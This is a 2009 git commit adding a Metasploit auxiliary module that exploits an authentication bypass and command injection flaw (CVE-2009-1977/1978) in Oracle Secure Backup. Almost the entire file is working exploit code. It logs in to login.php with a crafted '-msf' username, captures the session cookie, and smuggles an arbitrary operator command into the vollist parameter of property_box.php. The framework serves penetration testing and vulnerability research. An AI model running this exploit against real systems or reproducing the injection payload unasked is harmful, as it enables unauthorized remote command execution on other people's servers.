added auxiliary module osb_execqr2.rb

git-svn-id: file:///home/svn/framework3/trunk@7038 4d416f70-5f16-0410-b530-b9f4589650da
2009-09-16 12:07:07 +00:00 · 2009-09-16 12:07:07 +00:00 · e0e9ad670f
parent b5da2c72f2
commit e0e9ad670f
1 changed files with 74 additions and 0 deletions
--- a/modules/auxiliary/admin/oracle/osb_execqr2.rb
+++ b/modules/auxiliary/admin/oracle/osb_execqr2.rb
@ -0,0 +1,74 @@
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
 ##
 require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 	include Msf::Exploit::Remote::HttpClient
 	def initialize(info = {})
 		super(update_info(info,
 			'Name'           => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',
 			'Description'    => %q{
 					This module exploits an authentication bypass vulnerability 
 					in login.php in order to execute arbitrary code via a command injection 
 					vulnerability in property_box.php. This module was tested 
 					against Oracle Secure Backup version 10.3.0.1.0 (Win32).
 			},
 			'Author'         => [ 'MC' ],
 			'License'        => MSF_LICENSE,
 			'Version'        => '$Revision: $',
 			'References'     =>
 				[
 					[ 'CVE', '2009-1977' ],
 					[ 'CVE', '2009-1978' ],
 					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-058' ],
 					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-059' ],
 				],
 			'DisclosureDate' => 'Aug 18 2009'))
 		register_options(
 			[
 				Opt::RPORT(443),
 				OptString.new('CMD', [ false, "The command to execute.", "cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt" ]),
 				OptBool.new('SSL',   [true, 'Use SSL', true]),
 			], self.class)
 	end
 	def run
 		cmd = datastore['CMD']
 		res = send_request_cgi(
 			{
 				'uri'	=>  '/login.php',
 				'data'	=>  'button=Login&attempt=1&mode=&tab=75&uname=-msf&passwd=msf',
 				'method' => 'POST',
 			}, 5)
 			if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i))
 				sessionid = res.headers['Set-Cookie'].split(';')[0]
 					print_status("Sending command: #{datastore['CMD']}...")
 					send_request_cgi(
 						{
 							'uri'	=> '/property_box.php',
 							'data'  => 'type=Sections&vollist=75' + Rex::Text.uri_encode("&" + cmd),
 							'cookie' => sessionid,
 							'method' => 'POST',
 						}, 5)
 					print_status("Done.")
 			else
 				print_error("Invalid PHPSESSION token..")
 				return
 			end
 	end
 end